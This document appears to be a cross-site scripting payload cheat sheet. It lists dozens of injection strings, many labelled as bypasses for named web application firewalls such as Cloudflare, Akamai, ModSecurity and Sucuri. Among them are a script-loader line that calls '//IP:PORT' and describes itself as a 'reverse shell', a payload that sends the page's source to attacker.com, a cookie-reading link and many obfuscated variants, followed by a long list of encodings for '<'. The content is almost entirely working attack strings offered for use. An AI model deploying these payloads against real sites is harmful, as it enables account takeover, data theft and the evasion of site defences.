jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Hi'&gt;"<script src="//xss-server"></script><x="{9*9}\r\n%0a%09%0d<svg\onload=confirm(1)>
<x/onclick=alert``>
"><img src onerror=alert(1)>
<--`<img/src=` onerror=alert(3)> --!>
" autofocus onfocus=alert(4) fragment="
" onclick=alert`5` fragment="
<details/open ontoggle=alert(6)>
<svg/onload=alert`7`>
><svg/onload=confirm``>"@yahoo.com
</div><img/**/src/**/onerror=alert(1)>
<Svg%K9OnLoad=%7Krompt%6K1%6K>
"'`><svg/onload=alert`1234`>
๐’€€='',๐’‰บ=!๐’€€+๐’€€,๐’€ƒ=!๐’‰บ+๐’€€,๐’‡บ=๐’€€+{},๐’Œ=๐’‰บ[๐’€€++],
๐’€Ÿ=๐’‰บ[๐’ˆซ=๐’€€],๐’€†=++๐’ˆซ+๐’€€,๐’น=๐’‡บ[๐’ˆซ+๐’€†],๐’‰บ[๐’น+=๐’‡บ[๐’€€]
+(๐’‰บ.๐’€ƒ+๐’‡บ)[๐’€€]+๐’€ƒ[๐’€†]+๐’Œ+๐’€Ÿ+๐’‰บ[๐’ˆซ]+๐’น+๐’Œ+๐’‡บ[๐’€€]
+๐’€Ÿ][๐’น](๐’€ƒ[๐’€€]+๐’€ƒ[๐’ˆซ]+๐’‰บ[๐’€†]+๐’€Ÿ+๐’Œ+"(๐’€€)")()
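<script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script> ==> "reverse shell" (keeps re-loading a remote script into the page; it runs in the victim's browser in the page's origin, not on the server, and a CSP script-src that disallows inline scripts and unknown hosts stops it)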
<iframe/src=j%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0t:prompt `1`> --> test it
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> --> ModSecurity bypass
javascript:alert(1)
'-alert(1)-'
'-alert(1)//
`-alert(1)//\
\'-alert(1)//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
\u0027-confirm`1`-\u0027
"; ||confirm('XSS') || "
'*prompt(1)*'
${alert(1)}
{{32*32}}
""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y
"])},alert(1));(function xss() {//
'?prompt`1`?'
" onmouseover=alert(/@darknetguy/)
" onclick=alert(1)//">click
" autofocus onfocus=alert(1) "
" onfocus=prompt(1) autofocus fragment="
" onfocus=prompt(1) onmouseover="confirm(1) " style="position:absolute;width:100%;height:100%;top:0;left:0;"
" onmousemove=alert(/@darknetguy/)//">Milad
"><svg onload=alert(1)>.gif
http://www.<svg/onload=ConFirm`1`>.com
"><svg/onload=confirm(1)>"@yahoo.com
<form action=javascript:alert(1)//
<form><button formaction=javascript&colon;alert(1)>xss
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
<form id="test" /><button form="test" formaction="javascript:alert()">xss
<object data="data:text/html,<script>alert(5)</script>">
<iframe srcdoc="<svg onload=alert(4);>">
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>
<iframe src='jAvAsCripT:(alert)()'></iframe>
<script%20~~~>\u0061\u006C\u0065\u0072\u0074``</script%20~~~>
<?tag x="-->" test="<img src=x onerror=alert(1)//">
bypass alert filter (each line below reaches the same function, so blocking the literal string is not enough):
(alert)(1)
a=alert,a(2)
[3].find(alert)
al\u0065rt(4)
alert`5`
[6].map(alert)
[7].every(alert)
[8].filter(alert)
[9].findIndex(alert)
[10].forEach(alert)
self['alert'](11)
parent['alert'](12)
window['alert'](13)
Wordfence 7.4.2
<a href=&#01javascript:alert(1)>
Sucuri CloudProxy (POST only)
<a href=javascript&colon;confirm(1)>
ModSecurity CRS 3.2.0 PL1
<a href="jav%0Dascript&colon;alert(1)">
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<script>eval(location.hash.slice(2))</script> and end of url ==> #alert("testtesttestets")
<script>
x='<%'
</script> %>/
alert(2)
</script>
/<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> ---> cloudflare {`XSS´} «byPASS»
/<svg%0Aonauxclick=0;[1].some(confirm)//
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML"> ===> send current page's source to attacker site
===> write < in a different way
">'><details/open/ontoggle=confirm('XSS')> ===> maybe WAF bypasser (Test it)
<object/data="javascript&colon;alert/**/(document.domain)">// ===> Bypass CloudFront WAF
%3c<aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e ===> maybe WAF bypasser (Test it)
<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)"> ===> maybe WAF bypasser (Test it)
"><input/onauxclick="[1].map(prompt)"> ==> Sucuri WAF XSS bypass
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> ===> CloudFront XSS bypass
1'"><img/src/onerror=.1|alert``> ===> Cloudflare #XSS #Bypass via dot
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
<select><noembed></select><script x=โ€™a@bโ€™a>y=โ€™a@bโ€™//a@b%0a\u0061lert(1)</script x>
<a+HREF=โ€™%26%237javascrip%26%239t:alert%26lpar;document.domain)โ€™>
<!--><svg onload=alert(1)--> ===> bypass if comments are allowed
<svg onload="alert(1)" <="" svg=""
<svg onload=alert(1)//
<sVg/oNloAd=โ€JaVaScRiPt:/**\/*\โ€™/โ€\eval(atob(โ€˜Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==โ€™))โ€>
<iframe src=jaVaScrIpT:eval(atob(โ€˜Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==โ€™))>
** Akamai [KONA Site Defender] WAF Bypass **
<tiger/onpointerrawupdate=this['innerHTML']=unescape(location.hash);>XSS Me#<img src=x onerror=alert(0)>
<a href=โ€j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this[โ€˜documentโ€™][โ€˜cookieโ€™]&rpar;โ€>X</a> ==> Cloudflare Bypass
javascript:โ€/*โ€™/*`/* โ†’<html \โ€ onmouseover=/*&lt;svg/*/onload=alert()//>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'> ===> Akamai waf bypass
</script><svg><script>alert(1)%0A--> ===> It must land where JS syntax is not affected though
<link rel=import href='.&#47"><svg%20onload=alert(domain)>'>
<iframe src="javascript:alert(1)%%0D3C!--
<iframe src="javascript:alert(1)%%0D3C--
"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
<--` <body/onload=&lt;!--&gt;&#10alert(1)> --!>
i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t\(\1\)\'\s\rc\=\'e\'\20\>{
<script src=data:,alert(1)>
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
xโ€</title><img src%3dx onerror%3dalert(1)>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
<dETAILS%0Aopen%0AonToGgle%0A=%0Aa=prompt,a() x>
<svg onunload=http://window.open('javascript:alert(1)')>
XSS'\x22"%22>4<%\u0022/* ===> locator!
<ScRiPt src=https://yoursite.com/XSS.js>
<style/onload=alert(0)>
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0) ==> when injecting into src attributes, you need a javascript: URI payload
===> AWS WAF bypass
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´} ==> cloudflare «XSS» payload to bypass protection
IE weird behavior:
<iframe id=element></iframe>
<script>
element.alert(1)
</script>
Parentheses-free payload by @aemkei
<script>
onload=setTimeout
Event.prototype.toString=
_=>"alert\501\51"
</script>
<</div>script</div>>alert()<</div>/script</div>>
<</div> %3c script</div>>alert()<<</div>/script</div>
</ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``">
#Akamai #Bypass #XSS #BugBounty
Found a working #xss payload after brainstorming for a long #time.
#Tested on many sites with an Alexa ranking below #1000
Cloudflare WAF working again...
Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23x000000028;document.domain)>
One to bypass Cloudflare WAF by @JacksonHHax
<svg onload=alert%26%230000000040"1")>
<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C